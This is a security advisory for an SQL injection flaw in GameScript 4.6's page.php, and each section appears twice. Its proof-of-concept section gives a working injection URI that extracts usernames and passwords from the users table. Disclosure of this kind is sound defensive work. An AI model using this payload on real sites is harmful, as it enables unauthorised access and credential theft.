GameScript 'page.php' SQL Injection Vulnerability
BID:33486
Info
GameScript 'page.php' SQL Injection Vulnerability
| Bugtraq ID: | 33486 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 28 2009 12:00AM |
| Updated: | Jan 30 2009 03:29PM |
| Credit: | Encrypt3d.M!nd |
| Vulnerable: |
GameScript.net GameScript 4.6 |
| Not Vulnerable: | |
Discussion
GameScript 'page.php' SQL Injection Vulnerability
GameScript is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
GameScript 4.6 is affected; other versions may be vulnerable as well.
GameScript is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
GameScript 4.6 is affected; other versions may be vulnerable as well.
Exploit / POC
GameScript 'page.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/page.php?page=viewprofile&user=-Encrypt3d'%20union%20select%201,2,username,4,5,password,7,8,9,10,11,12%20from%20users/*
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/page.php?page=viewprofile&user=-Encrypt3d'%20union%20select%201,2,username,4,5,password,7,8,9,10,11,12%20from%20users/*
Solution / Fix
GameScript 'page.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].